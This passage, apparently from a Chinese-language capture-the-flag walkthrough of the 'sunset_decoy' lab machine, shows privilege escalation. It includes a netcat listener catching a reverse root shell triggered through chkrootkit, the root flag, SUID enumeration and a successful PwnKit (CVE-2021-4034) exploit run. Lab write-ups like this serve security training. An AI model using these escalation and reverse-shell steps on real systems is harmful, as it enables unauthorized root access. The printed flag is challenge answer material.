4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:5

The AV Scan will be launched in a minute or less.
--------------------------------------------------
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ 

反弹 shell 成功

┌──(kali㉿kali)-[~/Downloads/sunset_decoy/etc]
└─$ sudo nc -lvnp 4444                                             
[sudo] password for kali: 
listening on [any] 4444 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.131] 56014
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
uname -a
Linux 60832e9f188106ec5bcc4eb7709ce592 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:0e:3c:2a brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.131/24 brd 192.168.56.255 scope global dynamic enp0s3
       valid_lft 413sec preferred_lft 413sec
    inet6 fe80::a00:27ff:fe0e:3c2a/64 scope link 
       valid_lft forever preferred_lft forever
cd root
ls
chkrootkit-0.49
chkrootkit-0.49.tar.gz
log.txt
pspy
root.txt
script.sh
cat script.sh
FILE=/dev/shm/STTY5246
if test -f "$FILE"; then
    /root/chkrootkit-0.49/chkrootkit
else
    echo "An AV scan will not be launched."
fi
cat root.txt
  ........::::::::::::..           .......|...............::::::::........
     .:::::;;;;;;;;;;;:::::.... .     \   | ../....::::;;;;:::::.......
         .       ...........   / \\_   \  |  /     ......  .     ........./\
...:::../\\_  ......     ..._/'   \\\_  \###/   /\_    .../ \_.......   _//
.::::./   \\\ _   .../\    /'      \\\\#######//   \/\   //   \_   ....////
    _/      \\\\   _/ \\\ /  x       \\\\###////      \////     \__  _/////
  ./   x       \\\/     \/ x X           \//////                   \/////
 /     XxX     \\/         XxX X                                    ////   x
-----XxX-------------|-------XxX-----------*--------|---*-----|------------X--
       X        _X      *    X      **         **             x   **    *  X
      _X                    _X           x                *          x     X_


1c203242ab4b4509233ca210d50d2cc5

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

另外一些提权尝试

我还尝试过的一些提权方法，首先是查看SUID

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ find / -type f -perm -04000 -ls 2>/dev/null
   134602     44 -rwsr-xr-x   1 root     root        44440 Jul 27  2018 /usr/bin/newgrp
   134749     64 -rwsr-xr-x   1 root     root        63568 Jan 10  2019 /usr/bin/su
   135085     36 -rwsr-xr-x   1 root     root        34888 Jan 10  2019 /usr/bin/umount
   150671     24 -rwsr-xr-x   1 root     root        23288 Jan 15  2019 /usr/bin/pkexec
   131132     44 -rwsr-xr-x   1 root     root        44528 Jul 27  2018 /usr/bin/chsh
   160068    156 -rwsr-xr-x   1 root     root       157192 Feb  2  2020 /usr/bin/sudo
   131136     64 -rwsr-xr-x   1 root     root        63736 Jul 27  2018 /usr/bin/passwd
   131134     84 -rwsr-xr-x   1 root     root        84016 Jul 27  2018 /usr/bin/gpasswd
   135083     52 -rwsr-xr-x   1 root     root        51280 Jan 10  2019 /usr/bin/mount
   131131     56 -rwsr-xr-x   1 root     root        54096 Jul 27  2018 /usr/bin/chfn
   150673     20 -rwsr-xr-x   1 root     root        18888 Jan 15  2019 /usr/lib/policykit-1/polkit-agent-helper-1
   268427     12 -rwsr-xr-x   1 root     root        10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
   148942    428 -rwsr-xr-x   1 root     root       436552 Jan 31  2020 /usr/lib/openssh/ssh-keysign
   145624     52 -rwsr-xr--   1 root     messagebus    51184 Jun  9  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper

SUID 看到了 policykit-helper 尝试能不能提权

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ pkexec honeypot.decoy
==== AUTHENTICATING FOR org.freedesktop.policykit.exec ===
Authentication is needed to run `./honeypot.decoy\' as the super user                                                
Authenticating as: root
Password: 
polkit-agent-helper-1: pam_authenticate failed: Authentication failure
==== AUTHENTICATION FAILED ===
Error executing command as another user: Not authorized                                                             

This incident has been reported.

查看定时任务没收获

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *  * * *     root    cd / && run-parts --report /etc/cron.hourly
25 6  * * *     root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6  * * 7     root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6  1 * *     root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

看看内核和版本号，使用 CVE-2021-4034 提权成功。

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ chmod +x CVE-2021-4034 
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ ./CVE-2021-4034 
2023/07/19 09:24:40 CMDTOEXECUTE is empty fallback to default value
2023/07/19 09:24:40 Executing command sh
# whoami
root